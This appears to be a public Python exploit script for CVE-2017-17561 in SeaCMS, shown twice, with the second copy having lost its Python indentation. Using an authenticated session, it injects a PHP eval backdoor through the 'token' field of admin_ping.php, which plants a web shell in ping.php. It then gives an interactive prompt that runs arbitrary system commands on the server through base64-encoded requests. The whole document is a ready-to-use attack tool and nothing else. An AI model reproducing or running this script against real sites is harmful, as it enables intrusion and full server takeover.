WangYihang/seacms-authenticated-getshell.py

## seacms-authenticated-getshell.py
#!/usr/bin/env python
# encoding:utf-8
# Author: WangYihang
# Email: wangyihanger@gmail.com
# Comment: CVE-2017-17561 SeaCMS Authenticated Getshell

import requests
import sys
import readline

def exploit(host, port, path, session, password):
    url = "http://%s:%d/%s/admin_ping.php?action=set" % (host, port, path)
    data = {
        "weburl":"www.seacms.net",
        "token":"123456789\";$var=eval($_REQUEST[%s]).\"" % (password)
    }
    cookies = {
        "PHPSESSID":session
    }
    response = requests.post(url, data=data, cookies=cookies)
    print response.content

def usage(name):
    print "Usage:"
    print "\tpython %s [HOST] [PORT] [PATH] [PHPSESSID] [PASSWORD]" % (name)
    print "Example:"
    print "\tpython %s 127.0.0.1 80 admin n2njegrc8dfb5fvuckb2qbnr46 c" % (name)

def interactive(url, password):
    while True:
        command = raw_input("$ ")
        if command == "exit":
            break
        data = {
            password:"system(base64_decode('%s'));" % (command.encode("base64").replace("\n", ""))
        }
        print requests.post(url, data=data).content

def main():
    if len(sys.argv) != 6:
        usage(sys.argv[0])
        exit(1)
    host = sys.argv[1]
    port = int(sys.argv[2])
    path = sys.argv[3]
    session = sys.argv[4]
    password = sys.argv[5]
    exploit(host, port, path, session, password)
    url = "http://%s:%d/data/%s/ping.php" % (host, port, path)
    interactive(url, password)

if __name__ == "__main__":
    main()
	#!/usr/bin/env python
	# encoding:utf-8
	# Author: WangYihang
	# Email: wangyihanger@gmail.com
	# Comment: CVE-2017-17561 SeaCMS Authenticated Getshell

	import requests
	import sys
	import readline

	def exploit(host, port, path, session, password):
	url = "http://%s:%d/%s/admin_ping.php?action=set" % (host, port, path)
	data = {
	"weburl":"www.seacms.net",
	"token":"123456789\";$var=eval($_REQUEST[%s]).\"" % (password)
	}
	cookies = {
	"PHPSESSID":session
	}
	response = requests.post(url, data=data, cookies=cookies)
	print response.content

	def usage(name):
	print "Usage:"
	print "\tpython %s [HOST] [PORT] [PATH] [PHPSESSID] [PASSWORD]" % (name)
	print "Example:"
	print "\tpython %s 127.0.0.1 80 admin n2njegrc8dfb5fvuckb2qbnr46 c" % (name)

	def interactive(url, password):
	while True:
	command = raw_input("$ ")
	if command == "exit":
	break
	data = {
	password:"system(base64_decode('%s'));" % (command.encode("base64").replace("\n", ""))
	}
	print requests.post(url, data=data).content

	def main():
	if len(sys.argv) != 6:
	usage(sys.argv[0])
	exit(1)
	host = sys.argv[1]
	port = int(sys.argv[2])
	path = sys.argv[3]
	session = sys.argv[4]
	password = sys.argv[5]
	exploit(host, port, path, session, password)
	url = "http://%s:%d/data/%s/ping.php" % (host, port, path)
	interactive(url, password)

	if __name__ == "__main__":
	main()